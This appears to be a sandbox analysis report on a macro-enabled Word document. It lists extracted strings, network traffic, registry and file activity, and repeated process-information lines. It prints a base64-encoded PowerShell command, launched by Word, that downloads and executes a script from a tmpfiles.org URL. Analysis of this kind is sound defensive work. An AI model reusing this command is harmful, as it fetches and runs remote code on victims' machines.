Source: powershell.exe, 00000007.00000002.2130901589.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2139021203.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cog
Source: powershell.exe, 00000007.00000002.2130901589.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Nunito&display=swap
Source: powershell.exe, 00000007.00000002.2130901589.00000000048B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2130901589.0000000004EA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2134030741.00000000056C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org
Source: powershell.exe, 00000007.00000002.2130901589.00000000047B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2130901589.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: test.doc.bin.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: ~WRD0000.tmp.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: test.doc.bin.doc	OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal96.expl.evad.winDOC@5/14@1/1

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$st.doc.bin.doc

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{24544002-F428-4BCB-B2BB-57219DDD3388} - OProcSessId.dat

Jump to behavior

Source: test.doc.bin.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: test.doc.bin.doc	OLE document summary: title field not present or empty
Source: test.doc.bin.doc	OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: test.doc.bin.doc	Virustotal: Detection: 50%
Source: test.doc.bin.doc	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: test.doc.bin.doc	Initial sample: OLE summary codepage = 1200
Source: test.doc.bin.doc	Initial sample: OLE document summary codepagedoc = 1200

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:

Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.2130140644.0000000002761000.00000004.00000020.00020000.00000000.sdmp

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
